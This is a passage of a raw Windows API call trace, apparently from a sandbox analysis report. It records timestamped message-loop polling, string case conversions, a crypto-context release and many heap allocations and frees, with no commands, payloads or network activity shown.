wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0260.276] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.276] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0260.276] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0260.276] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0260.276] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0260.276] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0260.276] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0260.276] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0260.276] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0260.276] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0260.277] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0260.277] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0260.277] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0260.277] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0260.277] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0260.277] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0260.277] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0260.277] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0260.277] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0260.277] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0260.277] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0260.277] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0260.277] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0260.277] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0260.277] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0260.278] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0260.278] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0260.278] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0260.278] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0260.278] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0260.278] CryptReleaseContext (hProv=0xad31c0, dwFlags=0x0) returned 1 [0260.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0260.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0260.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0260.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0260.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0260.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0260.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0260.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0260.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0260.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0260.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0260.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0260.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0260.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0260.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0260.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0260.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0260.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0260.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0260.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0260.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0260.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0260.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0260.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0260.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0260.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0260.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0260.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0260.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0260.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0260.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0260.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0260.280] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0260.280] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0260.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0260.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0260.280] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0260.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0260.280] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0260.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0260.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0260.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0260.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0260.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0260.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0260.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0260.281] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0260.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0260.281] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0260.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0260.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0260.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0260.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0260.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0260.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0260.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0260.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0260.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0260.281] FreeLibrary (hLibModule=0x74d40000) returned 1 [0260.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0260.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0260.282] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0260.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0260.282] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0260.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0260.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0260.282] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0260.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0260.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0260.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0260.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0260.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0260.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0260.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0260.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0260.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0260.282] CloseHandle (hObject=0x2cc) returned 1 [0260.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0260.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0260.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3551008 | out: hHeap=0x25c0000) returned 1 [0260.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0260.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0260.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0260.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0260.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0260.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0260.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0260.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0260.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0260.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0260.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0260.285] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0260.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0260.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0260.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0260.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0260.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0260.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0260.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0260.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0260.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0260.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0260.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0260.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0260.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0260.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0260.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0260.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0260.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d80 [0260.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9fc0 [0260.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa230 [0260.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0260.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa908 [0260.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0260.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0260.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f30 [0260.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0260.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0260.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0260.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0260.287] CloseHandle (hObject=0x2d0) returned 1 [0260.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0260.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0260.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3561010 | out: hHeap=0x25c0000) returned 1 [0260.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0260.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0260.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0260.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0260.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0260.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0260.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0260.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0260.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0260.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0260.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0260.291] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0260.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0260.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0260.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0260.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0260.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0260.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0260.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0260.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0260.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0260.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0260.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0260.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0260.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0260.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0260.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0260.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0260.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0260.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0260.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0260.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0260.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0260.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0260.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0260.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0260.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0260.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0260.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0260.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0260.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0260.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0260.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0260.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0260.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0260.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0260.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0260.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0260.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0260.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0260.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0260.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0260.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0260.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0260.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: 